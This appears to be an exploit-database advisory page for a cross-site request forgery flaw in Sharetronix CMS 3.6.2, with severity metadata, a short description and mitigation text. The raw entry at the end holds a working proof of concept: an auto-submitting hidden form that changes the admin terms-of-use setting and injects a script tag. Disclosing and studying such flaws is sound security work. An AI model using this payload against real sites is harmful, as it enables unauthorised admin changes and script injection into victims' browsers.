header-logo
Suggest Exploit
vendor:
Sharetronix CMS
by:
Hesam Bazvand
5.5
CVSS
MEDIUM
XSRF
352
CWE
Product Name: Sharetronix CMS
Affected Version From: 3.6.2002
Affected Version To: 3.6.2002
Patch Exists: NO
Related CWE:
CPE: a:sharetronix:cms:3.6.2
Metasploit:
Other Scripts:
Platforms Tested: Windows 10, Kali Linux

Sharetronix CMS XSRF Vulnerability

This exploit takes advantage of a cross-site request forgery (XSRF) vulnerability in Sharetronix CMS version 3.6.2. By tricking a user into visiting a malicious website, an attacker can perform actions on behalf of the victim without their consent or knowledge. In this specific exploit, the attacker submits a form with hidden fields that contain malicious code to the target Sharetronix CMS installation, causing it to execute the code and display an alert box.

Mitigation:

To mitigate this vulnerability, users should update their Sharetronix CMS installation to the latest version available. Additionally, users should be cautious when clicking on links or visiting unfamiliar websites.
Source

Exploit-DB raw data:

 # Exploit Title: Sharetronix CMS XSRF Vulnerability
# Version : 3.6.2
# Exploit Author: Hesam Bazvand
# Software Link: http://sharetronix.ir/wp-content/uploads/2014/10/gold.zip
# Tested on: Windows 10 / Kali Linux
# Category: WebApps
# Dork : Use You Mind :D
# Email : Black.king066@gmail.com
# Video : https://youtu.be/S1r0tmXEUec


<body onload="document.fm.submit()">
<form method="post" name="fm"  action="http://localhost/share/admin/termsofuse">
<input type="hidden" name="tos_enabled" value="1" />
<input type="hidden" name="tos_content"value="<script>alert(1);</script>" />
</form>
</body>